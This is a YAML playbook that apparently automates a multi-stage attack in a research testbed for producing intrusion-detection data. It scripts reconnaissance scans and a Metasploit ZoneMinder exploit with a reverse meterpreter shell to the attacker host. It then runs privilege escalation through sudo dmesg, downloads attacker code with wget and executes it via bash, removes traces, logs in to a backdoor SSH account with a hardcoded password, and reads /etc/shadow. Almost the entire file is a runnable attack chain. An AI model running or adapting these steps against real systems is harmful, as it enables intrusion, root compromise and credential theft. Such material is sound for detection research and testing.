####################
#
# Scenario 1 b a
#
####################
msf_config:
  password: hackerman
  server: localhost

vars:
  $SERVER_ADDRESS: 192.42.0.254
  $ATTACKER_ADDRESS: 192.42.1.174
  $DNS_SERVER: 192.42.0.233
  $DOMAIN: aecid-testbed.com
  $USER: aecid
  $DNS_LIST: /usr/local/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
  $SSH_KEY: {{sshkey.public_key}}

commands:
  - type: shell
    cmd: 'echo "Target:  $SSH_KEY"'

  - type: shell
    cmd: dnsenum -f $DNS_LIST --dnsserver $DNS_SERVER $DOMAIN

  - type: shell
    cmd: sudo nmap -O -sT --top-ports 100 $SERVER_ADDRESS

  - type: shell
    cmd: "nikto -host $SERVER_ADDRESS"

  - type: shell
    cmd: "ffuf -w /usr/local/share/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -u http://$SERVER_ADDRESS/FUZZ"

  - type: msf-module
    cmd: exploit/unix/webapp/zoneminder_snapshots
    creates_session: "foothold"
    options:
      RHOSTS: 192.42.0.254
    payload_options:
      LHOST: 192.42.1.174
    payload: cmd/unix/python/meterpreter/reverse_tcp


  - type: msf-session
    stdapi: True
    session: "foothold"
    cmd: cd /tmp

  - type: msf-session
    session: "foothold"
    cmd: upload /var/www/html/linpeas.sh


  - type: msf-session
    cmd: shell
    session: "foothold"

  - type: msf-session
    cmd: python3 -c "import pty;pty.spawn(\"/bin/bash\")";
    session: "foothold"
 
  - type: msf-session
    cmd: export SHELL=bash
    session: "foothold"
 
  - type: msf-session
    cmd: export TERM=xterm256-color
    session: "foothold"
 
  - type: msf-session
    cmd: stty rows 38 columns 116
    session: "foothold"

  - type: msf-session
    cmd: 'export PS1="PWN >"'
    session: "foothold"

  - type: msf-session
    cmd: chmod +x linpeas.sh
    session: "foothold"

  - type: msf-session
    cmd: ./linpeas.sh -s -q -N 2> /dev/null
    session: "foothold"
    end_str: "PWN >"

  # wait a little bit for linpeas
  - type: sleep
    seconds: 380

  # This command fixes the outputbuffer
  # so that the output of the further
  # commands will work!
  - type: msf-session
    read: True
    cmd: id
    session: "foothold"

  - type: msf-session
    cmd: sudo dmesg -H
    write: True
    session: "foothold"

  - type: msf-session
    cmd: "!/bin/bash"
    session: "foothold"

  - type: msf-session
    cmd: id
    session: "foothold"
    end_str: "root@videoserver:/tmp#"


  - type: msf-session
    session: "foothold"
    cmd: "cd /root; wget -O README.txt http://$ATTACKER_ADDRESS/README.txt.4"
    end_str: "PWN >"

  - type: msf-session
    cmd: split --filter="cat $FILE | xargs bash -c " -C 2000 /root/README.txt
    session: "foothold"
    end_str: "PWN >"

  - type: msf-session
    cmd: rm /root/README.txt
    session: "foothold"
    end_str: "PWN >"

  - type: msf-session
    cmd: exit
    session: "foothold"
    end_str: "PWN >"


  - type: msf-session
    cmd: rm ./PwnKit
    session: "foothold"
    end_str: "PWN >"

  - type: msf-session
    cmd: rm linpeas.sh
    session: "foothold"
    end_str: "PWN >"

  - type: msf-session
    cmd: exit
    session: "foothold"

  - type: sleep
    seconds: 30

  - type: ssh
    cmd: id
    hostname: 192.42.0.254
    port: 2222
    username: debian
    password: haveityourway
    creates_session: "rootshell"

  - type: ssh
    cmd: pwd
    session: "rootshell"

  - type: ssh
    cmd: sudo cat /etc/shadow
    session: "rootshell"

  - type: ssh
    cmd: sudo lspci
    session: "rootshell"

  - type: ssh
    cmd: sudo bash -c "command -v lsusb"
    session: "rootshell"

  - type: ssh
    cmd: date
    session: "rootshell"

  - type: ssh
    cmd: sudo find /usr -name \*virtualbox\*
    session: "rootshell"


      #
      #  - type: msf-session
      #    cmd: sudo -l
      #
      #  - type: msf-session
      #    write: True
      #    cmd: "sudo dmesg -H"
      #
      #  - type: msf-session
      #    write: True
      #    cmd: "!/bin/bash\r\n"
      #
      #  - type: msf-session
      #    cmd: id
      #
      #  - type: msf-session
      #    cmd: ls -l /root
      #
